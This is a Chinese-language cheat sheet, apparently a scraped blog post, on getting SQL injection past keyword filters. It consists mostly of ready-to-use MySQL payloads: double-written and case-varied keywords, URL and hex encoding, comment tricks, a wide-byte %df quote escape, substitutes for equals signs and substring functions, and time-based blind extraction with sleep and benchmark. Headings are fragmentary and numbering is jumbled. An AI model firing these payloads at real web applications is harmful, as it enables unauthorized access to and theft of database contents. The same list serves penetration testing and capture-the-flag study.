SQL注入绕过方法
目录
参考:
https://blog.csdn.net/zizizizizi_/article/details/124094197
http://wed.xjx100.cn/news/143416.html?action=onClick
一、绕过关键字
1、大小写绕过
举例:2、双写绕过
举例:- -1' uniunionon seselectlect 1,2#
举例:- ?id=%2d%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%23
- ?id=-1'+union+select+1%2C2%23
- url解码:
- ?id=-1' union select 1,2#
举例:- -1' /*!union*/ /*!select*/ 1,2#
1、16进制编码绕过
举例:- -1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x64767761#
举例:- ?id=%2d%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%23
- url解码:
- ?id=-1' union select 1,2#
- -1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=concat(CHAR(100),CHAR(118),CHAR(119),CHAR(97))#
- -1%df' union select 1,2--+
1、注释符绕过
举例:- -1'/**/union/**/select/**/1,2#
- -1'/*!*/union/*!*/select/*!*/1,2#
- -1' union(select(1),(2))#
1、and绕过2、or绕过3、not绕过五、绕过等号
原型- -1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
- -1' union select 1,group_concat(table_name) from information_schema.tables where table_schema like database()#
- -1' union select 1,group_concat(table_name) from information_schema.tables where table_schema rlike database()#
- -1' union select 1,group_concat(table_name) from information_schema.tables where table_schema regexp database()#
- -1' union select 1,group_concat(table_name) from information_schema.tables where !(table_schema<>database())#
原型- 1' and if(ascii(substr(database(),1,1))>100,sleep(2),0)#
- greatest():
- greatest(n1, n2, n3…):返回n中的最大值
- 1' and if(greatest(ascii(substr(database(),1,1)),100)=100,sleep(2),0)#
- least():
- least(n1,n2,n3…):返回n中的最小值
- 1' and if(least(ascii(substr(database(),1,1)),100)=100,sleep(2),0)#
- strcmp():
- strcmp(str1,str2):若所有的字符串均相同,则返回0,若根据当前分类次序,第一个参数小于第二个,则返回-1,其它情况返回1
- 1' and if(strcmp(ascii(substr(database(),1,1)),100)=0,sleep(2),0)#
- 1' and if(ascii(substr(database(),1,1)) in (100),sleep(2),0)#
- 或
- 1' and if(substr(database(),1,1) in ("d"),sleep(2),0)#
- 1' and if(ascii(substr(database(),1,1)) between 90 and 100,sleep(2),0)#
- 1' and if(substr(database(),1,1) like "d%",sleep(2),0)#
1、from pos for len,其中pos代表从pos个开始读取len长度的子串- 1' and if(ascii(substr(database() from 1 for 1))=100,sleep(2),0)#
- -1' union select * from (select 1)a join (select 2)b#
- 1' and if(database() like "%d%",sleep(2),0)#
- 1' union select 1,2 limit 1 offset 0#
- 等价
- 1' union select 1,2 limit 0,1#
1、绕过sleep()
(1)benchmark函数- benchmark():第一个参数代表执行次数,第二个参数代表执行表达式
- 1' and benchmark(1000000000,1)#
(1)bin函数- bin():转换成二进制数
- 1' and if(bin(ascii(substr(database(),1,1)))=1100100,sleep(2),1)#
- hex():转换成十六进制数
- 1' and if(hex(substr(database(),1,1))=64,sleep(2),1)#
- ord():给定的字符串,其最左边的字符代码将被查找
- 1' and if(ord(substr(database(),1,1))=100,sleep(2),1)#
(1)concat_ws函数- concat_ws(分隔符,str1,str2):
- -1' union select 1,concat_ws(",","@",table_name) from information_schema.tables where table_schema=database()#
- concat():
- -1' union select 1,concat(table_name) from information_schema.tables where table_schema=database()#
(1)substring函数- substring(str,pos,len):
- 1' and if(substring(database(),1,1)="d",sleep(2),1)#
- mid(str,pos,len):
- 1' and if(mid(database(),1,1)="d",sleep(2),1)#
- left(str,len):
- 1' and if(left(database(),1)="d",sleep(2),1)#
- right(str,len):
- 1' and if(right(database(),1)="a",sleep(2),1)#
|
